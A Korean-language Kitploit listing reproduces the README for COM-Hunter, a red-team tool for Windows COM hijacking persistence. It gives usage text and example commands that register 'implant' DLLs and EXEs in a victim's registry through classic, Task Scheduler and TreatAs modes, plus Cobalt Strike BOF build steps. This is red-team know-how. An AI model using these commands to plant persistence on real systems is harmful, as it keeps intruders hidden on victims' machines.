Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
COM-Hunter — Windows COM 하이재킹 지속성 도구: 검색, 클래식, Task Scheduler, TreatAs 모드 지원. .NET 실행 파일 및 레드 팀 작전용 Cobalt Strike BOF 형태로 사용 가능. | Kitploit
도구/GitHubGitHub/nickvourd/com-hunter
Privilege EscalationPersistence MechanismsPenetration TestingRed Teaming
GitHubnickvourd/com-hunter

COM-Hunter

Windows COM 하이재킹 지속성 도구: 검색, 클래식, Task Scheduler, TreatAs 모드 지원. .NET 실행 파일 및 레드 팀 작전용 Cobalt Strike BOF 형태로 사용 가능.

저장소 보기
3886124일 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

COM-Hunter

COM 하이재킹 VOODOO



GitHub License GitHub Repo stars
GitHub forks GitHub watchers GitHub contributors

설명

COM-Hunter는 COM 하이재킹 지속성 도구입니다.

.NET 버전과 Cobalt Strike와 완벽히 호환되는 BOF 변형으로 제공됩니다.

Static Badge Static Badge Static Badge

다음 목록은 사용 가능한 모드를 설명합니다:

  • 검색 모드: HKLM 및 HKCU의 LocalServer32, InprocServer32 및 레지스트리 항목을 기반으로 CLSID를 검색합니다.
  • 클래식 지속 모드: LocalServer32 또는 InprocServer32를 사용하여 클래식 COM 하이재킹 지속성을 수행합니다.
  • 작업 스케줄러 모드: LocalServer32 또는 InprocServer32를 사용하여 작업 스케줄러를 통해 자동으로 COM 하이재킹 지속성을 설정합니다.
  • TreatAs 모드: TreatAs 레지스트리 키와 가짜(전달 가능) CLSID를 사용하여 LocalServer32 또는 InprocServer32를 통해 COM 하이재킹 지속성을 수행합니다.
  • 제거 모드: HKLM 및 HKCU에서 LocalServer32, InprocServer32 및 관련 레지스트리 항목에 의존하는 지속성 메커니즘을 제거합니다.

ℹ️ 이 도구는 선정되어 Cobalt Strike Community Kit의 일부로 자랑스럽게 포함되었습니다.

버그를 발견하시면 주저하지 말고 보고해 주세요. 귀하의 피드백은 이 프로젝트의 품질을 향상시키는 데 중요합니다!

면책 조항

이 프로젝트의 저자와 기여자는 도구의 불법 사용에 대해 책임을 지지 않습니다. 이 도구는 교육 목적으로만 제공됩니다. 사용자는 합법적인 사용을 보장할 책임이 있습니다.

목차

  • COM-Hunter
    • 설명
    • 면책 조항
    • 목차
    • 감사의 말
    • 사용법
    • .NET 예제
    • BOF 구현
    • 참고 문헌

감사의 말

이 프로젝트는 @nickvourd와 @S1ckB0y1337에 의해 ❤️로 제작되었습니다.

베타 테스트 단계에서 귀중한 도움을 주신 친구 Marios Gyftos 님께 특별히 감사드립니다.

@zeropointsecltd의 RTO 과정에서 영감을 받았습니다.

BOF 구현은 Lefteris Panos와 그의 멋진 프로젝트 RegPersist에서 영감을 받았습니다.

base.c 및 bofdefs.h 파일은 TrustedSec의 CS-Situational-Awareness-BOF 프로젝트에서 직접 가져온 것입니다.

사용법

root@kitploit:~
 ██████╗ ██████╗ ███╗   ███╗      ██╗  ██╗██╗   ██╗███╗   ██╗████████╗███████╗██████╗
██╔════╝██╔═══██╗████╗ ████║      ██║  ██║██║   ██║████╗  ██║╚══██╔══╝██╔════╝██╔══██╗
██║     ██║   ██║██╔████╔██║█████╗███████║██║   ██║██╔██╗ ██║   ██║   █████╗  ██████╔╝
██║     ██║   ██║██║╚██╔╝██║╚════╝██╔══██║██║   ██║██║╚██╗██║   ██║   ██╔══╝  ██╔══██╗
╚██████╗╚██████╔╝██║ ╚═╝ ██║      ██║  ██║╚██████╔╝██║ ╚████║   ██║   ███████╗██║  ██║
 ╚═════╝ ╚═════╝ ╚═╝     ╚═╝      ╚═╝  ╚═╝ ╚═════╝ ╚═╝  ╚═══╝   ╚═╝   ╚══════╝╚═╝  ╚═╝

                                   Version: 3.0
                             @nickvourd && @S1ckB0y1337
                  ~ Inspired during the RTO course by @zeropointsecltd ~

Usage: COM_Hunter.exe <mode> <options>

[+] Available Modes:
    search             Search Mode
    persist            Classic Persist Mode
    tasksch            Task Scheduler Mode
    treatas            TreatAs Mode
    remove             Remove Mode

[+] Search Mode:
Usage:  COM-Hunter.exe search <CLSID> <options>
    -a, --all                   Search DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Search DLL implementations in HKLM and HKCU
    -l, --localserver32         Search EXE implementations in HKLM and HKCU
    -m, --machine               Search DLL and EXE implementations in HKLM
    -u, --user                  Search DLL and EXE implementations in HKCU

[+] Classic Persist Mode:
Usage:  COM-Hunter.exe persist <CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Task Scheduler Mode:
Usage:  COM-Hunter.exe tasksch <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] TreatAs Mode:
Usage:  COM-Hunter.exe treatas <CLSID> <fake_CLSID> <binary_path> <option>
    -i, --inprocserver32        Set DLL implementation
    -l, --localserver32         Set EXE implementation

[+] Remove Mode:
Usage:  COM-Hunter.exe remove <CLSID> <options>
    -a, --all                   Remove DLL and EXE implementations in HKLM and HKCU
    -i, --inprocserver32        Remove DLL implementations in HKLM and HKCU
    -l, --localserver32         Remove EXE implementations in HKLM and HKCU
    -m, --machine               Remove DLL and EXE implementations in HKLM
    -u, --user                  Remove DLL and EXE implementations in HKCU

.NET 예제

ℹ️ HKLM 및 HKCU에서 DLL 및 EXE 구현 검색:

root@kitploit:~
.\COM-Hunter.exe search 01575CFE-9A55-4003-A5E1-F38D1EBDCBE1 -a

ℹ️ HKLM 및 HKCU에서 EXE 구현 검색:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l

ℹ️ HKLM에서 고급 EXE 구현 검색:

root@kitploit:~
.\COM-Hunter.exe search "{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" -l --machine

ℹ️ HKCU에서 EXE 및 DLL 구현 검색:

root@kitploit:~
.\COM-Hunter.exe search AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 --user

ℹ️ DLL 구현을 사용한 클래식 지속성 수행:

root@kitploit:~
.\COM-Hunter.exe persist AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 C:\Users\victim\Desktop\implant.dll -i

ℹ️ EXE 구현을 사용한 클래식 지속성 수행:

root@kitploit:~
.\COM-Hunter.exe persist "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" C:\Users\victim\Desktop\implant.exe --localserver32

ℹ️ DLL 구현을 사용한 작업 스케줄러를 통한 지속성 수행:

root@kitploit:~
.\COM-Hunter.exe tasksch C:\Users\victim\Desktop\implant.dll --inprocserver32

ℹ️ TreatAs 레지스트리 키와 가짜 (전달 가능) CLSID를 사용하여 DLL 구현 지속성 수행:

root@kitploit:~
.\COM-Hunter.exe treatas AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 "{00000012-1312-1997-2605-F38D1EBDCBE1}" C:\Users\victim\Desktop\implant.dll -i

ℹ️ HKCU에서 DLL 구현 지속성 제거:

root@kitploit:~
.\COM-Hunter.exe remove AB8902B4-09CA-4bb6-B78D-A8F59079A8D5 -i -u

BOF 구현

ℹ️ MinGW-w64 도구 체인 (x86_64-w64-mingw32-gcc 및 i686-w64-mingw32-gcc) 필요

ℹ️ 두 아키텍처에 대한 BOF 객체 컴파일:

root@kitploit:~
./make_all.sh

다음 작업을 수행합니다:

  1. com_hunter_* 디렉토리를 생성합니다.
  2. com_hunter_*.x64.o 및 com_hunter_*.x86.o를 컴파일합니다.
  3. 두 객체 파일을 com_hunter_*/ 디렉토리로 이동합니다.

ℹ️ BOF 모듈을 컴파일한 후 com_hunter_bof.cna를 Cobalt Strike에 로드하십시오.

ℹ️ 빌드 아티팩트를 정리하려면 각 src 디렉토리로 이동하여 다음을 실행하십시오:

root@kitploit:~
make clean

참고 문헌

  • Persistence: "the continued or prolonged existence of something": Part 2 – MDSec의 COM Hijacking
  • Abusing the COM Registry Structure (Part 2): BOHOPS의 Hijacking & Loading Techniques
  • Userland Persistence with Scheduled Tasks and COM Handler Hijacking by Enigma0x3
  • COM Objects Hijacking by Virus Total
  • CS-Remote-OPs-BOF GitHub 리포지토리 by TrustedSec
  • A Developer's Introduction to Beacon Object Files by TrustedSec
  • Zeropoint Security의 BOF 개발 및 트레이드크래프트 과정
도구 다운로드